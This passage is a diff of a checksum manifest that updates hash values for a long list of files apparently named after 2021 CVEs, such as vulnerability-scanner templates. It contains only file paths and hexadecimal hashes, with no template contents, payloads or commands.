+http/cves/2021/CVE-2021-25085.yaml:fcc9a88c4acb265eb20878dec5e33514a1a5033b +http/cves/2021/CVE-2021-25099.yaml:bf6c1fa945a65ec2c5e3c72686fcfa843b4b955b +http/cves/2021/CVE-2021-25104.yaml:a9f4ab9e62f46c33a75bcfdb636104c315e64501 +http/cves/2021/CVE-2021-25111.yaml:d19a01e296638b07999162707ee972861947e804 +http/cves/2021/CVE-2021-25112.yaml:43063e1c7c3c7e691345690a06833d5ecae93326 +http/cves/2021/CVE-2021-25114.yaml:e741372d0fe1b504545c949af1ee418a9327e1ae +http/cves/2021/CVE-2021-25118.yaml:d2bbcf8130bd778a464f7a05152ed7f4a7ce9bc9 +http/cves/2021/CVE-2021-25120.yaml:8e49fec1ef37e23ea292500bf4885c12272ea639 +http/cves/2021/CVE-2021-25281.yaml:939424919f14f8e6b5590fbd6aaee28f5b46e6e5 +http/cves/2021/CVE-2021-25296.yaml:f48e67ccf79361212161144cbc87ed1ae7836b06 +http/cves/2021/CVE-2021-25297.yaml:1d6b257aa61b2197e44f22f5d3b8cc74116829cf +http/cves/2021/CVE-2021-25298.yaml:fe99fa23aff019906f4966e83e531b2210c212da +http/cves/2021/CVE-2021-25299.yaml:42ba4761f2dc6754937250edbbd05fdc32d2ec3b +http/cves/2021/CVE-2021-25646.yaml:fe141d0d42834c7b26651459796110306381de59 +http/cves/2021/CVE-2021-25864.yaml:dfa73f0e39a5931b4aa038877382a554971567f8 +http/cves/2021/CVE-2021-25899.yaml:c537545ec09c8a8cd5e953035a5c254c559c723b +http/cves/2021/CVE-2021-26084.yaml:c339fba05755ac81399bc10639e0ebb91656afc9 +http/cves/2021/CVE-2021-26085.yaml:ac224a47e326b4fd069497e41fc3f3613194b903 +http/cves/2021/CVE-2021-26086.yaml:a2781e3aa75e96ace5e08bf99a99589fc885d9c4 +http/cves/2021/CVE-2021-26247.yaml:8dc85cf38e0a1a7cd68c274df33c6355fcb29fb4 http/cves/2021/CVE-2021-26292.yaml:558cdf6607e7485ecb080ba9409f3500976d831d -http/cves/2021/CVE-2021-26294.yaml:e5ffcfa4b086b256322dc2f7d1bb9c6e53aba6a6 -http/cves/2021/CVE-2021-26295.yaml:092e9186349964c59ddfa22c64bb8bfaf5dfb2f1 -http/cves/2021/CVE-2021-26475.yaml:33d940513e63c428d66d2669d4bad51edf927551 -http/cves/2021/CVE-2021-26598.yaml:e62bb7a94a846244dc5a9d6a16f1e7ad8f0bc526 -http/cves/2021/CVE-2021-26702.yaml:db3b99479383e24b9f85ab144f3c4ce1ff517918 -http/cves/2021/CVE-2021-26710.yaml:b61a3eb6cdecf476048bad69719d1ed8eedffff3 -http/cves/2021/CVE-2021-26723.yaml:a2c12b692e5c7477e9d5d44f7ade0c903b337894 -http/cves/2021/CVE-2021-26812.yaml:b9d8afa06a7bb318f2b33ff1bcc74476c98b9e4d -http/cves/2021/CVE-2021-26855.yaml:3b1aecb20e0725400f26d345ecca4aba7961feae -http/cves/2021/CVE-2021-27124.yaml:82ce264b14417294f51fc66fed1f3265db4e3dae -http/cves/2021/CVE-2021-27132.yaml:c6052a4986352cacd6c12002154d442211596149 -http/cves/2021/CVE-2021-27309.yaml:3d2c0cafc14f4c81c20bc60459b195a6dd842fe3 -http/cves/2021/CVE-2021-27310.yaml:6ecec8698e1bc44501884e1f7a6de86af52c6dd4 -http/cves/2021/CVE-2021-27314.yaml:19eac9144e87a811fc9ae7bcc4a1d0770baccbf6 -http/cves/2021/CVE-2021-27315.yaml:08ee82e0b752a6e4b644261b61c7d27dba70b240 -http/cves/2021/CVE-2021-27316.yaml:80d061315802459b1f23bbddfb921da21137b608 -http/cves/2021/CVE-2021-27319.yaml:9ea4c2316c885d5df0534e5b1bc8d58d2626d425 -http/cves/2021/CVE-2021-27320.yaml:e00aa257d83773e450b5f50f50ecd2fd074524a8 -http/cves/2021/CVE-2021-27330.yaml:bf955f92e00bada50a86fc22eba6ade64ad14dfb -http/cves/2021/CVE-2021-27358.yaml:b8ebaeccd8226c009c310c252f6a55ea9095d905 -http/cves/2021/CVE-2021-27519.yaml:389195bfcf2c3c27f186d4dd5ab4b8bba259fb04 -http/cves/2021/CVE-2021-27520.yaml:aa455b8c75d581baa590bf44c5bad00cc8ae1fcf -http/cves/2021/CVE-2021-27561.yaml:78bdd8e151f60efa2e61548eb332300066f71f79 -http/cves/2021/CVE-2021-27651.yaml:355aa78f577facf8e6de679cc6dc457ba20347f5 -http/cves/2021/CVE-2021-27670.yaml:eca486a09fe9f0e9628172aa324f430bd68191c1 +http/cves/2021/CVE-2021-26294.yaml:1292042adfe32bbf8f6474a22fefde92ee4b473c +http/cves/2021/CVE-2021-26295.yaml:d8749ccd3d76343112b7867e3eb1d86611262225 +http/cves/2021/CVE-2021-26475.yaml:beaeba3a7f2259b71c071ba3e139c6a4750e75e3 +http/cves/2021/CVE-2021-26598.yaml:02bd1205b306c3ac155ab59cb7f025261f83824a +http/cves/2021/CVE-2021-26702.yaml:1db7f2dba187aa48e7c2d59cc1ca6cd23effb509 +http/cves/2021/CVE-2021-26710.yaml:3b1a2dc1d403c45232e69ded5918a993195f816a +http/cves/2021/CVE-2021-26723.yaml:c07ad9e38d025f87b3eb75dabcf55c1ab0dda4f7 +http/cves/2021/CVE-2021-26812.yaml:4b62939c015c6bd97bcb6364393e67ae0a04424b +http/cves/2021/CVE-2021-26855.yaml:a89d4ecb737cbe09ff763b3aa9bc18cf5b8e3ef4 +http/cves/2021/CVE-2021-27124.yaml:e7494dcb96e9ce5774b8c1c54f3adf4eac829d93 +http/cves/2021/CVE-2021-27132.yaml:940e077386f9c0b007170468404c1a67caf32da5 +http/cves/2021/CVE-2021-27309.yaml:d945b27a87dee476f79be1a3cf5fef8a22546e4f +http/cves/2021/CVE-2021-27310.yaml:c6f85be0d203dfebfe8e0085814cd05fb7b0a11c +http/cves/2021/CVE-2021-27314.yaml:aa1578e7ae0fa188766936a1932cd010e0fbd78f +http/cves/2021/CVE-2021-27315.yaml:0b1aaa867b77e7df115aa107abd893c4c122eb5d +http/cves/2021/CVE-2021-27316.yaml:6b138288972f7dcc77c3fcd1f42a97a068570914 +http/cves/2021/CVE-2021-27319.yaml:387eb351097e9f2eb2c87ab200846f44b3bc86cc +http/cves/2021/CVE-2021-27320.yaml:2bc921e59727fe3cd0807c236de6f302a13b429b +http/cves/2021/CVE-2021-27330.yaml:198f4e267d96481582d40857806716fb2a034ff4 +http/cves/2021/CVE-2021-27358.yaml:57621501a82fd35735cf094849f5e10deb53ac80 +http/cves/2021/CVE-2021-27519.yaml:392255630bb03b9ade0c94d0bc62cfaf932f9f04 +http/cves/2021/CVE-2021-27520.yaml:3fb9ca664db3b6484aa8f5dfe660d5643e8463a4 +http/cves/2021/CVE-2021-27561.yaml:ad74f491a90450e475e23b560c5c41d719e781d8 +http/cves/2021/CVE-2021-27651.yaml:238d5b74e0894fc3deeced824121841ba3b41c21 +http/cves/2021/CVE-2021-27670.yaml:3d68b033cb41254ae24fb7df1c3d11f31f456398 http/cves/2021/CVE-2021-27748.yaml:235fd926b38fd422e040ec81eafa4e25859cd0d7 -http/cves/2021/CVE-2021-27850.yaml:f56d9fa28502c0d16b8c66fcd4d47847b9ab7b84 -http/cves/2021/CVE-2021-27905.yaml:11bf9fbebf5b09f1509b553d53756ebdee0696be -http/cves/2021/CVE-2021-27909.yaml:c7518b3d0ad4e4a2bcfa1de67eff0bc6c24de8ec -http/cves/2021/CVE-2021-27931.yaml:fc13e52be1d71b0c2d00fa32e64b38922386912d +http/cves/2021/CVE-2021-27850.yaml:5cb69e6ffcd7bab6176957b27ed174a2e3a22dac +http/cves/2021/CVE-2021-27905.yaml:de6e22e05560bc96ccbf80d805fb24e790c1c053 +http/cves/2021/CVE-2021-27909.yaml:0f80233d18eae5c1070a16ff7e2ee73cd34794d2 +http/cves/2021/CVE-2021-27931.yaml:3e8cb0b73bc4086435507a07a9614fe7a68c5d0b http/cves/2021/CVE-2021-28073.yaml:848d59d5ee09cd8808fb5b1e696b8db5e9537ae7 -http/cves/2021/CVE-2021-28149.yaml:57e924955833b19d3d6f340be9aaf1415f053a96 -http/cves/2021/CVE-2021-28150.yaml:e1fea36b74b2fe571241f57a51426f565d46e91c -http/cves/2021/CVE-2021-28151.yaml:7286e219a8f16855c54f88fd6fa7dd4c9f0578c6 +http/cves/2021/CVE-2021-28149.yaml:26a100a03084f368b457a07d5f02c3b20819008d +http/cves/2021/CVE-2021-28150.yaml:5298fc6decee2d2492190435c52f2dca7bb4bda8 +http/cves/2021/CVE-2021-28151.yaml:03fdd968b8240c367859713a1a989995d8898e4b http/cves/2021/CVE-2021-28164.yaml:380141e225a5336856e1dbd3a28924630af5c850 -http/cves/2021/CVE-2021-28169.yaml:0775bedbb8b38fbd1f52b349b6e59d9ba6c5c83b -http/cves/2021/CVE-2021-28377.yaml:0130c1eb9bb4d1946748fbd7eaeff6bbafb09899 -http/cves/2021/CVE-2021-28419.yaml:a1e39263d6a4a8f8a2c1b4bfd1981e0d3d1be13c +http/cves/2021/CVE-2021-28169.yaml:69037a8212a5c9c6d0ab3ef5fed313f6a59f6e9a +http/cves/2021/CVE-2021-28377.yaml:22f9b897868b41da421a2196b9aa60240d9920ad +http/cves/2021/CVE-2021-28419.yaml:d65945d2a307ab8bcd1809b2896a339f31393450 http/cves/2021/CVE-2021-28854.yaml:4798c2ab310061e834e42a70cf2c92ab69cb058b -http/cves/2021/CVE-2021-28918.yaml:0c82620bb1f050cb8c98de6b71b4ccddd0d3d8df -http/cves/2021/CVE-2021-28937.yaml:a3ba71cbe9bcb081ad4bd5ea75259887bfdcf5e6 -http/cves/2021/CVE-2021-29006.yaml:ec8dfd754984f7827a297dee0a16a170eaedfa28 -http/cves/2021/CVE-2021-29156.yaml:c8dd97b399039d1c2088ff6c308e00259250a5e9 -http/cves/2021/CVE-2021-29200.yaml:ab5386f0416976a18cc63133b99b18d82a172ce1 -http/cves/2021/CVE-2021-29203.yaml:e918aada039e30f07d8bbbd558f0a72d7a138a25 -http/cves/2021/CVE-2021-29441.yaml:c326b4a945167cf1d43e6411ef322151861e77d2 -http/cves/2021/CVE-2021-29442.yaml:54a4abb1c6919640073a67ad7c0b52fd405d1a10 -http/cves/2021/CVE-2021-29484.yaml:3d42d5a72130ba9a59fa84c6fbc4f6d1353f7aec -http/cves/2021/CVE-2021-29490.yaml:0b9820c5b4b54df7ed60703849930d8301636cb4 -http/cves/2021/CVE-2021-29505.yaml:4ea8003268ab195d7499c2eaf850f629bd289578 -http/cves/2021/CVE-2021-29622.yaml:04660ca648ebfc933303789b09c652e885ed0927 -http/cves/2021/CVE-2021-29625.yaml:485d28752445801d0de02506e969eee938d4401e -http/cves/2021/CVE-2021-3002.yaml:2ed00489cc4d5833a5e795318353a535c5de959b -http/cves/2021/CVE-2021-30049.yaml:1f75a3bcbc461647f85624fba736a623ffa6dd0d -http/cves/2021/CVE-2021-30128.yaml:3eb3b1eed2b05255e8ee4153ab8f64856132fd3f -http/cves/2021/CVE-2021-30134.yaml:e08719154b2f62a6717585e25349877c3be621c5 -http/cves/2021/CVE-2021-30151.yaml:9048d6d6de8693ffa219583b755a69da69f4ee2c -http/cves/2021/CVE-2021-3017.yaml:a3cf9aa550b792268e2c2771ed9176bca8f3d92b -http/cves/2021/CVE-2021-30175.yaml:0e38a2d974b144d6f8df2efe2361938d70c71cc1 -http/cves/2021/CVE-2021-3019.yaml:bf0a3f6f068d91a3c7b69ebb0603f4a83adae829 -http/cves/2021/CVE-2021-30213.yaml:644d0276d0791a04bf065d44e018d8efd62934e2 -http/cves/2021/CVE-2021-30461.yaml:9c4de6f9798dd40bb36941eef061d7ea3dcde822 -http/cves/2021/CVE-2021-30497.yaml:ab2e2b72ec953aa2866be35c4539e8088ee2ea91 -http/cves/2021/CVE-2021-3110.yaml:7b3bd87c017375e6bbb0ff02e6afcbdd50695819 -http/cves/2021/CVE-2021-31195.yaml:b364f46f589d501bc8847bf23e5259da622af113 -http/cves/2021/CVE-2021-31249.yaml:14e43d5dcda543eed3dbc4588640426aefca25cf -http/cves/2021/CVE-2021-31250.yaml:40b162d66ca50ac6e19c0a28329ea17d447a0e29 -http/cves/2021/CVE-2021-3129.yaml:12c561bf6decc661618f620e18206434328d7dd1 -http/cves/2021/CVE-2021-31537.yaml:76820461751eabb37f30efff1ed99a0fd94d3181 -http/cves/2021/CVE-2021-31581.yaml:6c922d44ae5d035dbe0eff7f286fc69eb1a58cd2 -http/cves/2021/CVE-2021-31589.yaml:8fbc016bad43b5ccdfd69658091fae1c317f22e1 -http/cves/2021/CVE-2021-31602.yaml:0ca85da95bfa08d06c663a0fa9feaab49885524d -http/cves/2021/CVE-2021-31682.yaml:40b873dcf567c30f83362c6c5ea253d1ff352f67 -http/cves/2021/CVE-2021-31755.yaml:c4b801f00d346d212c88646e4c234d1e9b5b3214 -http/cves/2021/CVE-2021-31805.yaml:f76414cabb7341495c84f2048fe27e470c591d0a -http/cves/2021/CVE-2021-31856.yaml:a7599711dd40f3e0de6ea228659199a8f3b8406f -http/cves/2021/CVE-2021-31862.yaml:62d4c62df0ae9398c113b22f7f31877918d9bd9c -http/cves/2021/CVE-2021-32030.yaml:a12220f3683299365495c0ade29f50b273d6a48b -http/cves/2021/CVE-2021-32172.yaml:5b6dadfaf1be4569a1a68b68fd8686721e8bb1f7 -http/cves/2021/CVE-2021-3223.yaml:157bba6ccbbce9117ad742b98e06d2eed754dc50 -http/cves/2021/CVE-2021-32305.yaml:10209c2a6d620874767d00ff2ed13fd680d09adf -http/cves/2021/CVE-2021-32618.yaml:0b899f6378aa1475b0a5a16c49fc98a6ba82a0bd -http/cves/2021/CVE-2021-32682.yaml:d53ec79b1568d38e9811d96df24da5a741848f42 -http/cves/2021/CVE-2021-32789.yaml:29e8e9f86ca8b1e8615f001cac209024f5d6ba37 -http/cves/2021/CVE-2021-32819.yaml:35403d09e774716fa6b4f14d30a5919b0e10b823 -http/cves/2021/CVE-2021-32820.yaml:c730da2831aa2041cc9c3e541a26107ad1202f7a -http/cves/2021/CVE-2021-32853.yaml:6b148655c4e50524e142c3c26f001e60c680c81d -http/cves/2021/CVE-2021-3293.yaml:4a98d7ac9fd09a814c9003e30496c2db8800c977 -http/cves/2021/CVE-2021-3297.yaml:a3d3a106db354cdb1cdba2822cf6ae8c29075ebe -http/cves/2021/CVE-2021-33044.yaml:b79541a1a8185e1b8d4ded599805a761df257384 -http/cves/2021/CVE-2021-33221.yaml:4ee2b7430d04595365ec770e23ff0ceab42ad1ac -http/cves/2021/CVE-2021-33357.yaml:5ee3098eda1176aabb711d34ce9fad9f88334e9d -http/cves/2021/CVE-2021-33544.yaml:ded4d8cd157b9187ab71cb07bfda155a20fd73b5 -http/cves/2021/CVE-2021-33564.yaml:2abd8868f44872d18c037c387227362318874c2f -http/cves/2021/CVE-2021-33690.yaml:14d86eac503f66ebe47c2621047831606bd9582d -http/cves/2021/CVE-2021-3374.yaml:33b8846d990e63e9c11d7ee301eddc4ce0d01e7b -http/cves/2021/CVE-2021-3377.yaml:956715c9823c4d8d676c9894d5c8ffcb4a05229b -http/cves/2021/CVE-2021-3378.yaml:79891ba4b0fecf0cc6f1ecfab32c591aeb9bd475 -http/cves/2021/CVE-2021-33807.yaml:17db0cdfd2fbfb8da80ac8d0ecc5e555c24d3e6d -http/cves/2021/CVE-2021-33851.yaml:7eb08709eda585b60aca6e2d4589844c751f9a18 -http/cves/2021/CVE-2021-33904.yaml:dc87749928bb1119c21f340f1155c70a0cc8e41b -http/cves/2021/CVE-2021-34370.yaml:bbea5ceb72e10f12936511a60a42b03cc3279939 -http/cves/2021/CVE-2021-34429.yaml:05a33980a4221a8aaf78a1ada86752c533d86a76 -http/cves/2021/CVE-2021-34473.yaml:a7c77893700793f192d2d738442a88229ab22a07 -http/cves/2021/CVE-2021-34621.yaml:e83294f04a5ca9ff61aee7322a56880a770ff982 -http/cves/2021/CVE-2021-34640.yaml:6d9f1a32e4a08e3143c45465bf1845a9acb0e914 -http/cves/2021/CVE-2021-34643.yaml:48f86033ac6a2627bbb54fed90c0ff1af3f36fa2 -http/cves/2021/CVE-2021-34805.yaml:8717c0269b483db5d2c0e02e21369c53f8247300 -http/cves/2021/CVE-2021-35250.yaml:d4c834f691f406e21f911b2e0c0254fd1a041025 -http/cves/2021/CVE-2021-35265.yaml:3ab024780525ef630178f29888123d450abd769d -http/cves/2021/CVE-2021-35323.yaml:4a197cb1b4b3f7eaf078d6fc7e00a8dc3f6ed73b -http/cves/2021/CVE-2021-35336.yaml:39f39cb471798f46f80d0b52eebb4d7659e0642c -http/cves/2021/CVE-2021-35380.yaml:8a49cc29025b0547e4a60ac4ed1e8ef32365843d -http/cves/2021/CVE-2021-35395.yaml:4796169e30e53ea0bd0212b92d9392f3de57a8b1 -http/cves/2021/CVE-2021-35464.yaml:ec0e45f137c9b64f00e52939dfb202c1bfdc8956 -http/cves/2021/CVE-2021-35488.yaml:a30a3dfe2e75a8a3af9d5a250858376a2c7af445 -http/cves/2021/CVE-2021-35587.yaml:207056686804000b23c303053d55e04200927f05 -http/cves/2021/CVE-2021-3577.yaml:982755018ea2e8fb8f02d2ff6eba9fc821f6b7e0 -http/cves/2021/CVE-2021-36260.yaml:9eb2151da851b8bcf632b55fc1cde4e548ca2446 -http/cves/2021/CVE-2021-36356.yaml:0a58b725588c8840fbf0fcc4d628eb9734026531 -http/cves/2021/CVE-2021-36380.yaml:a05ad61b46e24bdca202a26240bad48ca30b2859 -http/cves/2021/CVE-2021-36450.yaml:b306aab986630c228e868111e67819dc518ddbd5 -http/cves/2021/CVE-2021-3654.yaml:e1e9e4277b827d1c29e06467d477fdc660e5c40b -http/cves/2021/CVE-2021-36580.yaml:90beb14f1f12c078d00510d8deca70445fb6b423 -http/cves/2021/CVE-2021-36748.yaml:13be4d6df349193c113fe27ff6b81c2dac88bb68 -http/cves/2021/CVE-2021-36749.yaml:8059f33c86823bcdb8fb3b081160689ab7601e63 -http/cves/2021/CVE-2021-36873.yaml:512a889341aeb256d8aa40826fe61eca416fb921 -http/cves/2021/CVE-2021-37216.yaml:22510be3a3dc76794a81507c7d0504e1fc4f9245 -http/cves/2021/CVE-2021-37304.yaml:8a91fbc5e90c239c1d975cfa20b2687812d62555 -http/cves/2021/CVE-2021-37305.yaml:addf9de561935e6fd60d22ed3e540123fbed8ca9 -http/cves/2021/CVE-2021-37416.yaml:435de37d5f226ba7f18c1d0463f6703f8c2d5fef -http/cves/2021/CVE-2021-37538.yaml:2a60f7933cc36946ffaabe1ce0a8f71b1dee9f98 -http/cves/2021/CVE-2021-37573.yaml:1eedc6297c9936c8315695c5beeee40d02a56e00 -http/cves/2021/CVE-2021-37580.yaml:0f3edcbb4674ba70f20ca1a1c9959aafae2bdc16 -http/cves/2021/CVE-2021-37589.yaml:d08a4f6702dc9904cd27d425f7c9065624efd579 -http/cves/2021/CVE-2021-37704.yaml:74a48e388e4ec2273d50c1a9513bd0ddda785b9d -http/cves/2021/CVE-2021-37833.yaml:d9e3efad50484b1a8807e7cb267842efde8619e2 -http/cves/2021/CVE-2021-38314.yaml:7d786ece43ecfb967f9ee276ebc40036d76334ae -http/cves/2021/CVE-2021-38540.yaml:27d619d1f744b1a3170ad94bc3eb3c005edca8a3 -http/cves/2021/CVE-2021-38647.yaml:d5014015f1a1700b14dfe6b967593eeda3574d7f -http/cves/2021/CVE-2021-38702.yaml:668da82d799cc7398ff0b28baace6e8facf41eb1 -http/cves/2021/CVE-2021-38704.yaml:a8946ef453985028669e2e2d8c4512105e14934c -http/cves/2021/CVE-2021-38751.yaml:5d89756baad06f072dd06d79842319e7eb2b8599 -http/cves/2021/CVE-2021-39141.yaml:25c9fb8b840b78fd66562484dc50941eb0e7103e -http/cves/2021/CVE-2021-39144.yaml:97cf210d7a81942202358a9f6ffd21a5d6bb97a1 -http/cves/2021/CVE-2021-39146.yaml:dd289a79efbb0f1795c4d3ce5bc7268918dbc149 -http/cves/2021/CVE-2021-39152.yaml:28667a29331e6bb7dbf9059c7bb2fb8332a8dc14 -http/cves/2021/CVE-2021-39165.yaml:54f6d9d23d0268dd37ce67e4bab1da93aeab0702 -http/cves/2021/CVE-2021-39211.yaml:5746d467a323e27b0989889a757c4ba6c741d65b -http/cves/2021/CVE-2021-39226.yaml:a31de74e4a0653c9deade6575da3a07918898ea2 -http/cves/2021/CVE-2021-39312.yaml:06d0af609f207eeccb0babd1784823c091fdc0ab -http/cves/2021/CVE-2021-39316.yaml:6c3c10df9e55a5fd15e1cfeaf8841e4b38fae227 -http/cves/2021/CVE-2021-39320.yaml:47c8d37e115de8f70994345c04eda8f233d00bbb -http/cves/2021/CVE-2021-39322.yaml:a643c1afca38b29c3f4947762cddbc3a7b3c1bb0 -http/cves/2021/CVE-2021-39327.yaml:40a0f00ae103fdeb549e64298a6fd89f05c08b6d -http/cves/2021/CVE-2021-39350.yaml:d67708ef90a99350002b99cfad0f70035ced3254 -http/cves/2021/CVE-2021-39433.yaml:8ef46f1b7ba151475606f58386b0035f6e3da07c -http/cves/2021/CVE-2021-39501.yaml:79b09abfb6089ada18c03675e35d0c8b455ad1e7 -http/cves/2021/CVE-2021-40149.yaml:df65fc5d779a3d5d1ee2f32b22484a48eb5d5563 -http/cves/2021/CVE-2021-40150.yaml:d9142899aabc315e351053010f3ad8eadc002e85 -http/cves/2021/CVE-2021-40323.yaml:f33fdc78237e55ec1aca792a2ede85d23164d337 -http/cves/2021/CVE-2021-40438.yaml:000a824e225f4b33acf38f87e38b5c4a2baff001 -http/cves/2021/CVE-2021-40539.yaml:2419bc36d429ca52660474e29a4192ea4981c316 -http/cves/2021/CVE-2021-40542.yaml:4977ec5a6dcab706539603632453b555a7dc8313 -http/cves/2021/CVE-2021-40661.yaml:522d5d17c8073104e5ac1da77d350a3f87bd4da8 -http/cves/2021/CVE-2021-40822.yaml:32cb1844e20d40b7921663bbba2a0c63efa62497 -http/cves/2021/CVE-2021-40856.yaml:3835bf7addcd82d9b7e1811f11cda0406b371d34 -http/cves/2021/CVE-2021-40859.yaml:a722317c65ae1f8f51235dda9936fb13111d7773 -http/cves/2021/CVE-2021-40868.yaml:651c2cb91c6a80f3e43afb31289ec0b3c53d657a -http/cves/2021/CVE-2021-40870.yaml:ebc554edc4a8feff36f891311e61a9217014d92d -http/cves/2021/CVE-2021-40875.yaml:9dcb60e392a006008beaeca05c79d696c21fa57b -http/cves/2021/CVE-2021-40908.yaml:d7821861ac22cfb0de3d0b22bb6f8dc9fea3eb59 -http/cves/2021/CVE-2021-40960.yaml:dce7b525c274a4f9b52f98949d1cb7b1df56e06e -http/cves/2021/CVE-2021-40968.yaml:28625be67269b7b6ab03473c8a5e68a84807272e -http/cves/2021/CVE-2021-40969.yaml:2cebc816fdaaa71b014f07384f9189d30b6f94f3 -http/cves/2021/CVE-2021-40970.yaml:1e97d259a35d3b30a4cf17511e404886c7b50f52 -http/cves/2021/CVE-2021-40971.yaml:956b0772efd87ed7fe8beb50aeb4a0dc38dee66a -http/cves/2021/CVE-2021-40972.yaml:7f6b692b0ede9f02084d385562882440e55000db -http/cves/2021/CVE-2021-40973.yaml:12ccf9abbdd1eacaea19e41c1888a770859e40ea -http/cves/2021/CVE-2021-40978.yaml:d362e562790f260372d87e640ad55415e664a3b4 -http/cves/2021/CVE-2021-41174.yaml:83af2cf9356faad91d2276202e96af0e85f1932b -http/cves/2021/CVE-2021-41192.yaml:9b13b96315c9d5657be42ab1ffe6992a7cd5a85f -http/cves/2021/CVE-2021-41266.yaml:c6146f1aed61a76fb31bc8aa0976224794056523 -http/cves/2021/CVE-2021-41277.yaml:a89aba135d38d0d50e1607e54abffa55b4af1fd5 -http/cves/2021/CVE-2021-41282.yaml:8c0a042b45585fbd303469ccce175cc453aed292 -http/cves/2021/CVE-2021-41291.yaml:9b18cde3b6335d8c22f378a43c6703832e4b0dba -http/cves/2021/CVE-2021-41293.yaml:9bcd10e63ed99d31defcb7c6bbc8e6e77126f2a6 -http/cves/2021/CVE-2021-41349.yaml:2da5208acc2ce81dd37af731688f8e67baecdcff -http/cves/2021/CVE-2021-41381.yaml:3668f67c5ebf893f0405bfb11d36797e1d060093 -http/cves/2021/CVE-2021-41432.yaml:5c0ece40e9e84ea10b9eaea9c1f1e787593eb479 -http/cves/2021/CVE-2021-41460.yaml:5ad590b1515145c0eb1c5f4999714943a6c8c1a8 -http/cves/2021/CVE-2021-41467.yaml:72ff2480582ca743b09e26cef945f53bf5cc46d9 -http/cves/2021/CVE-2021-41569.yaml:644f3a4fa7a751b190dac2d9c71d14806ca07320 -http/cves/2021/CVE-2021-41648.yaml:9eb18e38a77d3739ebec6f404effe1642c6b6559 -http/cves/2021/CVE-2021-41649.yaml:5b28368b8af05469a4526548c4a2ab969900dfc0 -http/cves/2021/CVE-2021-41653.yaml:600acc0b50bac0c9d4ff654223fe3a51a0391b30 +http/cves/2021/CVE-2021-28918.yaml:f9b604e4650f1cb0f8fc5e435e0a886da3e877e7 +http/cves/2021/CVE-2021-28937.yaml:4495308c903229605694375929feb57b4877183f +http/cves/2021/CVE-2021-29006.yaml:6213d644d163110a84f09a4b41ebc2d880b933f0 +http/cves/2021/CVE-2021-29156.yaml:43ff09212a394f9494b907d0d654472d3808bc4e +http/cves/2021/CVE-2021-29200.yaml:671855ff36936437744ee0a0fb5191ed57a3e531 +http/cves/2021/CVE-2021-29203.yaml:f0876f40b20057f313362170378099acd424a820 +http/cves/2021/CVE-2021-29441.yaml:73f69aed081847abbdf1bc7bbd46722f7a45bf3a +http/cves/2021/CVE-2021-29442.yaml:581278933f0f13f34ccdf9af6b8e8d26fef1028a +http/cves/2021/CVE-2021-29484.yaml:9206cde418def74f1d8601203c0502cab49196ec +http/cves/2021/CVE-2021-29490.yaml:833ce1a2e22ce993495f72b852a2036695c26045 +http/cves/2021/CVE-2021-29505.yaml:ed81d4db502c4b1daeb8cf569b9069937f7f99ef +http/cves/2021/CVE-2021-29622.yaml:d72f7d7f0d4043872bf30d253701dc4af9936e3f +http/cves/2021/CVE-2021-29625.yaml:ac55c55069ab40c7e633f9f74a17d5a30d018eeb +http/cves/2021/CVE-2021-3002.yaml:b222f1370d4fa62a704c23c112e0443d586eb6e2 +http/cves/2021/CVE-2021-30049.yaml:2a45087ca0e2c5749d529148572f448bc7a28424 +http/cves/2021/CVE-2021-30128.yaml:1640137f3bed8c457788b92210d189f85c68e9a7 +http/cves/2021/CVE-2021-30134.yaml:046ef7cd8af9862ab3332abd3a2a92bdc1b93ef9 +http/cves/2021/CVE-2021-30151.yaml:0d86b514f0691e0dbcae694278f426efebdd09ef +http/cves/2021/CVE-2021-3017.yaml:e12e2d8939f1f93d7100c90c089c5f328066e94a +http/cves/2021/CVE-2021-30175.yaml:d0ea8ab51f44a23cbe8ec93857f44bb7e502fd21 +http/cves/2021/CVE-2021-3019.yaml:5a3dd43a82e7742deb6da2f0d4c2909f5fa8defc +http/cves/2021/CVE-2021-30213.yaml:13270e992be6c5440d90657ffb32489ca593ddb7 +http/cves/2021/CVE-2021-30461.yaml:26f3f5a022fde76abfee9b8fa1e7ae867a6eb23f +http/cves/2021/CVE-2021-30497.yaml:9ebbad61b0cac9922202a5f65bcdc7a9e5371f18 +http/cves/2021/CVE-2021-3110.yaml:30965df7691c01991afd5a8b5361a4bcfa846a76 +http/cves/2021/CVE-2021-31195.yaml:26dc59608efcd97e58264bda81b502fb9933e376 +http/cves/2021/CVE-2021-31249.yaml:78ac28065bb9487feb4c6ec4049e1d2a8f4cc6c1 +http/cves/2021/CVE-2021-31250.yaml:f015211a1470e6501e617faa6bc97a2eb1b8115f +http/cves/2021/CVE-2021-3129.yaml:9886947f01fb5d354b085f66eb8d4bf4b5d113db +http/cves/2021/CVE-2021-31537.yaml:1576466c79583316b7e6cb00b01a5a7bcea19b7e +http/cves/2021/CVE-2021-31581.yaml:e0480c6b83a7fa8e6bac20cf57def73a9d4bac47 +http/cves/2021/CVE-2021-31589.yaml:70f0fd2cdb3e0720f7856dbf8a276b1ce8ea4446 +http/cves/2021/CVE-2021-31602.yaml:dd4704489ecb97d0879fc46b164c08843575ea2f +http/cves/2021/CVE-2021-31682.yaml:8fc4edf120fef198c6dc65f0b9575912ed2c9539 +http/cves/2021/CVE-2021-31755.yaml:cbf56b15b0b1f62f9493ee284411e6579958f968 +http/cves/2021/CVE-2021-31805.yaml:3c5e35d50975ace3a2e3b8838c7dadee98df026c +http/cves/2021/CVE-2021-31856.yaml:d9fd2bda89d45c8c8fc445c9ca241228759a183a +http/cves/2021/CVE-2021-31862.yaml:2e9f7320cd8376e1958c423ec788ca5f976ea5c1 +http/cves/2021/CVE-2021-32030.yaml:ea537f2353f478aa73400b232d66b475e7cd755b +http/cves/2021/CVE-2021-32172.yaml:c28f45620710c1dad401a1b985e07bc699fa51d1 +http/cves/2021/CVE-2021-3223.yaml:096162c6ec6d00bbef2c159d44bac39a7f74022b +http/cves/2021/CVE-2021-32305.yaml:781feca8b8246c695d9b3980297853e9a8435de6 +http/cves/2021/CVE-2021-32618.yaml:5709adf69a6a343f9233e0358f57f2549cac6033 +http/cves/2021/CVE-2021-32682.yaml:29deb14e2a585f6a46acafb78fd17a9aebe56156 +http/cves/2021/CVE-2021-32789.yaml:695c4c7c806e585e1d33cb4bc4a427445fad8f69 +http/cves/2021/CVE-2021-32819.yaml:03565cd6da03c3af2ed35c5660d9d46d29263a5c +http/cves/2021/CVE-2021-32820.yaml:8dbce472dc7351b86a029c9d4512b83a4584e774 +http/cves/2021/CVE-2021-32853.yaml:c9d2d2bf2bd662e94520cb3b6026d908b2ca848c +http/cves/2021/CVE-2021-3293.yaml:019e52761b5fe85a4ce111f14df9693c95478ddd 